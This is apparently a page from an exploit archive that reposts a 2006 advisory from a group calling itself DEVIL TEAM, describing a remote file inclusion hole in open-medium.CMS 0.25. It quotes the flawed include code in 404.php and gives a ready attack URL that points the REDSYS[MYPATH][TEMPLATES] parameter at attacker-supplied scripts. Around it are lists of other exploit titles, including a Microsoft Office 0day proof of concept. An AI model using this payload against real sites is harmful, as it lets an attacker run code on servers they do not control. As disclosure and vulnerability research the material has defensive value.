exploits , vulnerabilities , articles , open-medium.CMS <= 0.25 (404.php) Remote File Include Vulnerability

2007-06-09 e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit
2007-05-22 TutorialCMS <= 1.01 Authentication Bypass Vulnerability
2007-04-16 audioCMS arash 0.1.4 (arashlib_dir) Remote File Inclusion Vulnerabilities
2007-04-14 bloofoxCMS 0.2.2 Cross Site Scripting
2007-04-14 Frogss CMS <= 0.7 Remote SQL Injection Exploit
2007-04-10 SimpCMS Light <= 04.10.2007 (site) Remote File Inclusion Vulnerability

2006-05-25

open-medium.CMS <= 0.25 (404.php) Remote File Include Vulnerability

Rated as : High Risk

################ DEVIL TEAM THE BEST POLISH TEAM #################
#open-medium (0.25) - Content Management System - Remote File Include
Vulnerabilities
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
##################################################################
[code]
404.php:

.......

} else {
// templates verwenden
if
(!@include($REDSYS["MYPATH"]["TEMPLATES"]."/redsys".$REDSYS["LanguagePath"]."/404.tmp"))
{
include($REDSYS["MYPATH"]["TEMPLATES"]."/redsys/404.tmp");
}
}

?>

[/code]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.site.com/[open-mediumCMS_path]/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=[evil_scripts]


###################################################################
#Elo ;-)


securitydot.net - 2006-05-25

Exploits - newest 10 RSS | More

2007-06-15 37773 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 19602 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 23322 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 19651 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 12063 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 10258 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 12460 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 10335 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 22284 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 10830 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit